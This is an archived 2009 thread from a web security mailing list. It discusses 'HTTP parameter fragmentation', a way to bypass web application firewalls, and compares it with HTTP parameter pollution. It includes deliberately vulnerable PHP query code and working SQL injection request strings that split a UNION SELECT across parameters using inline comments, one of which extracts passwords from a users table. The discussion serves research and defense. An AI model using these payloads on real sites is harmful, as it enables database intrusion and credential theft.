[WEB SECURITY] HTTP parameters fragmentation

PortSwigger mail at portswigger.net
Thu Aug 20 03:11:29 EDT 2009


For what it's worth, there is an example of using inline comments to span an
XSS attack across multiple different parameters on p412 of The Web
Application Hacker's Handbook.

Cheers
PortSwigger

-----Original Message-----
From: Steve Pinkham [mailto:steve.pinkham at gmail.com] 
Sent: 19 August 2009 21:30
To: lavakumar kuppan; websecurity at webappsec.org
Subject: Re: [WEB SECURITY] HTTP parameters fragmentation

I agree. If it's two different parameters, it's not quite the same as 
HPP.  Somehow glanced over that detail ;-) On the other hand, some of 
the effects of HPP are similar to what you describe.

It's not really a novel technique, I've used it in the past to get 
around XSS filters,  but I'm at a loss for a definitive place to point 
for documentation on the issue.
Anyone?

Steve
lavakumar kuppan wrote:
> Not really.
> When multiple parameters of the same name are sent in a single request, 
> different web technologies(ASP,ASP.NET <http://ASP.NET>, Java, Python, 
> Perl, PHP etc) handle it differently.
> This is a problem with the implementation of the HTTP protocol on these 
> technologies. This is what HPP deals with.
> 
> And when it comes to WAF bypass with HPP, the problem is the failure of 
> WAF to mimic the server technology's HTTP implementation, causing 
> an impedance mismatch.
> 
> 
> Dmitriy's method does not exploit impedance mismatch or weakness of the 
> HTTP implementaion.
> Instead it is a clever way to exploit a specific type of SQL injection 
> vulnerability(involving two vulnerable parameters in the same query) by 
> splitting the payload so that it cannot be filtered by the WAF but can 
> still be executed by the server.
> 
> Though superficially the two techniques appear to be similar, they are 
> exploiting weaknesses in two different areas.
> The user of inline-comments to join the parts of the payload is what is 
> common here.
> 
> This would classify as payload obfuscation IMHO
> 
> Cheers,
> Lava
> http://www.lavakumar.com
> 
> On Thu, Aug 20, 2009 at 12:29 AM, Prasad Shenoy <prasad.shenoy at gmail.com 
> <mailto:prasad.shenoy at gmail.com>> wrote:
> 
>     Steve Pinkham nailed it I guess. It is a form of HPP? No?
>      
>     P. N. Shenoy
> 
>     On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in
>     <http://lavakumar.in>@gmail.com <http://gmail.com>> wrote:
> 
>         Hi Dmitriy,
> 
>         That is very interesting. It very closely resembles the
>         ModSecurity Filter Bypass that I had discovered sometime back.
>         There is just one small difference, I was using the same
>         parameter multiple times(HTTP Parameter Pollution) while you are
>         using multiple parameters, nice trick!
> 
>         I had written a whitepaper on the same, you can find it at
>         http://lavakumar.com/Split_and_Join.pdf
>         The ModSecurity advisory is at
>         http://lavakumar.com/modsecurity_hpp.txt
> 
>         You can find more information about HPP
>         at
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
> 
>         Hope this helps.
> 
>         Cheers,
>         Lava
>         http://www.lavakumar.com <http://www.lavakumar.com/>
> 
> 
>         2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com
>         <mailto:devteev at ptsecurity.com>>:
> 
>          > While preparing an article about WAF bypassing methods, I
>         found an
>          > interesting way to bypass filters via HTTP parameters
>         fragmentation.
>          >
>          >  
>          >
>          > Vulnerable code example
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']);
>          >
>          >  
>          >
>          > The following request doesn't allow to conduct an attack
>          >
>          > index.php?a=1+union+select+1,2/*
>          >
>          >  
>          >
>          > The following request's succeeded using HPF
>          >
>          > index.php?a=1+union/*&b=*/select+1,2
>          >
>          >  
>          >
>          > In the case, SQL request looks like
>          >
>          > select * from table where a=1 union/* and b=*/select 1,2
>          >
>          >  
>          >
>          > Another example:
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']." limit
>          > ".$_GET['c']);
>          >
>          > Query("select * from table where a=".$_GET['a']." and
>         b=".$_GET['b']." order
>          > by ".$_GET['c']." limit 1");
>          >
>          >  
>          >
>          > Using HPF (HTTP Parameter Fragmentation), the request's
>         succeeded:
>          >
>          > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>          >
>          >  
>          >
>          > The question is: is there any name for the technique? Please,
>         advise me if
>          > you know articles or experts in  the field (for example, I
>         found a reference
>          > in
>          >
>
http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-Fa
voriteXSS-SLIDES.pdf,
>          > page 79).
>          >
>          > Thank you for help and cooperation in advance!
>          >
>          >  
>          >
>          > - - - - - - - - - - - - - - -
>          > Best Regards, Dmitry Evteev
>          > Positive Technologies Co.
>          > Tel.: (495) 744-0144
>          > Web: http://www.ptsecurity.ru <http://www.ptsecurity.ru/>
>          >
>          >  
> 
> 
> 


-- 
  | Steven E. Pinkham                      |
  | Security Researcher, Maven Security    |
  | steve.pinkham at mavensecurity.com        |
  | GPG public key ID CD31CAFB             |

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list